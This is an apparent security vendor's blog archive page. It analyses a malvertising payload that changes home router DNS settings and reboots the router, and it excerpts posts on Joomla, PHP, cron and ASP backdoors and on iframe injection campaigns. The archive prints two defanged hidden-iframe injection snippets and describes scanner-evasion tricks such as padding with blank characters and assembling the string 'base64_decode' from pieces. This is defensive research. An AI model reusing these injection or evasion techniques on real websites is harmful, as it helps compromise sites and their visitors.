Malvertising Payload Targets Home Routers

A few weeks ago we wrote about compromised websites being used to attack your web routers at home by changing DNS settings. In that scenario the attackers embedded iFrames to do the heavy lifting, the short fall with this method is they require a website to inject the iFrame. As is often the case, tactics change, and while home routers still seem to be of interest, the latest tactic seems to take the conquer one, conquer all idiom very seriously by targeting ad networks in a concept known as malvertising.

Malvertisements or malvertising are a malicious variety of online advertisements generally used to spread malware. – Kaspersky

This definition is a bit dated, but you get the point. It’s the act of an attacker making use of of what could be a good or bad advertisement on a website, they key these days is the exploitation of what are known as ad servers. Where website integrate a third party ad service to show appropriate ads based on the users visiting and the information the ad network has on the user. It’s a much more complex scenario, but hopefully you get the point.

In this scenario, the attacker is leveraging an ad, part of a large ad network, and embedding their router focused payload within the body of the ad. The ad was being hosted on network.

What to Look For

We were notified of suspicious activity by a attentive client that noticed several log in boxes opening while browsing his own website. If you recall, this was the same behavior that led us to the original discovery. He identified malicious ad, hattip for that kind sir, and sent us the link. This naturally gave us what we needed to start analyzing what it was doing.

I was able to capture the URLs it accessed:

Sucuri - Malvertising - URL's

Sucuri – Malvertising – URL’s

The malicious code was heavily encoded and injected in the ad body. This is what the raw payload looked like:

Sucuri - Malvertising - Raw Ad Payload

Sucuri – Malvertising – Raw Ad Payload

After sanitizing the code I was able to catch the decoding function that will translate all the noise.

Sucuri - Malvertising - Breaking Down the Noise

Sucuri – Malvertising – Breaking Down the Noise

Decoding the malicious content, I went through 2,716 blank characters before I found something malicious. It’s hard to tell if this was intentional to evade detection, but the code is there, and it is trying to change your home routers DNS settings and force a reboot.

This time they issue a command to remotely reboot it to make sure the DNS cache is flushed and the malicious site is loaded.

The second improvement is a counter. Unfortunately, during testing was disabled.


It appears to be configuring a server in LA as an DNS server, which seems to be working fine; during our tests it didn’t return any malicious addresses. All resolved IP addresses were correct, which means it’s probably waiting for the go-live.

The second DNS server set is Google’s, which means they probably had only one compromised server this time. We’ll continue to update as more information becomes available.

Highly Effective Joomla Backdoor with Small Profile

It feels like every day we’re finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can’t lie – these are truly gems. The methods that attackers are implementing are, in some instances, ingenious. I think you’ll agree that this case falls into that category.

In short, this is a highly effective backdoor that carries small profile, making it High Speed Low Drag.

Understanding Attackers

As we’ve discussed in the past, most attackers have a pretty standard workflow when compromising websites. Here’s that process in its simplest form:

  1. Identify point of entry / weakness.
  2. Exploit the entry / weakness.
  3. Ensure that they can retain access.
  4. Cover your tracks.

I agree, nothing earth shattering, but it does help us understand what it is we need to be looking for.
Read More

PHP Backdoors: Hidden With Clever Use of Extract Function

When a site gets compromised, one thing we know for sure is that attackers love to leave malware that allows them access back into the site; this type of malware is called a backdoor. This type of malware was named this because it allows for remote control of a compromised website in a way that bypasses appropriate authentication methods. You can update your site, change passwords, along with any of your admin procedures, and the backdoor would still be there allowing unexpected access to an attacker.

Backdoors are also very hard to find because they don’t have to be linked directly in the website, they can be very small and be easily confused with “normal” code. Some of them have passwords, some are heavily encrypted/encoded and can be anywhere on your site, file system or database.

We have written extensively about website backdoors (generally in PHP) that allow for continuous reinfections and control of hacked websites.
Read More

Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iframes that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// ohui.cgi?19" width="1" 

Read More

The Hidden Backdoors to the City of Cron

Cron Malware Backdoor

An attacker’s key to creating a profitable malware campaign is persistence. Malicious code that is easily detected and removed will not generate enough value for the attacker. This is the reason why we are seeing more and more malware using creative backdoor techniques, different obfuscation methods, and using unique approaches to increase the lifespan of any given attack.

Today we found this malware; a simple, but heavily encoded SPAM injector that was prepended to a valid Joomla File. Yes, nothing new, we have thousands of blog posts that show this kind of malware:

Read More

How We Decoded Some Nasty Multi-Level Encoded Malware

From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases.

Recently, I crossed pathes with this little gem:


That snippet is encoded malicious content. The full payload is is much bigger, 12816 characters, to be exact. Seems benign, right? At least it looks interesting. So interesting that I decided to dissect it, piece by piece.

Read More

Understanding Google’s Blacklist – Cleaning Your Hacked Website and Removing From Blacklist

Today we found an interesting case where Google was blacklisting a client’s site but not sharing the reason why. The fact they were sharing very little info should not be new, but what we found as we dove a little deeper should be. The idea is to provide you webmasters with the required insight to understand what is going on, and how to troubleshoot things when your website is blacklisted.

Get Your Bearing

While investigating the website, we found that some Google shortened URLs were being loaded and redirecting to Two of the links were pointing to Wikipedia images, their icon to be specific, and one was redirecting to shortener.

Read More

Blackhat SEO and ASP Sites

It’s all too easy to scream and holler at PHP based websites and the various malware variants associate with the technology, but perhaps we’re a bit too biased.

Here is a quick post on ASP variant. Thought we’d give you Microsoft types some love too.

Today we found this nice BlackHat SEO attack:

Sucuri SiteCheck ASP Malware

Read More

Backdoor Evasion Using Encrypted Content

A few weeks ago on the Sucuri Research Labs we mentioned a new type of malware injection that does not use base64_decode, and instead conceals itself as a variable and is built with a combination of “base_” + (32*2) + “_decode”. This is the part of the code where it is hidden:


Any tool that looks for eval, followed by base64_decode, or just flags on any base64_decode usage, will not find it.

Read More

Malware iFrame Campaign from Sytes(.)net

For the last few weeks we have been tracking a large malframe (malicious iframe) campaign that has been injecting iframes from random domains from sytes(.)net into compromised sites.

Malicious iframe injection is nothing new, the bad guys have been using domains for a long time. But what is catching our attention is how often these domains are changing and how short a life-span they have.

This is the payload being added to the compromised sites:

<iframe src="httX:// /cart/manuallogin/linktous.php?guardian=82" 
    width=1 height=1 style="visibility: hidden"></iframe>

As you can see, it is a normal iframe injection. But that domain will go offline in approximately 30 minutes and get replaced by a new one. Here is a list we compiled over the past 24 hours:

Read More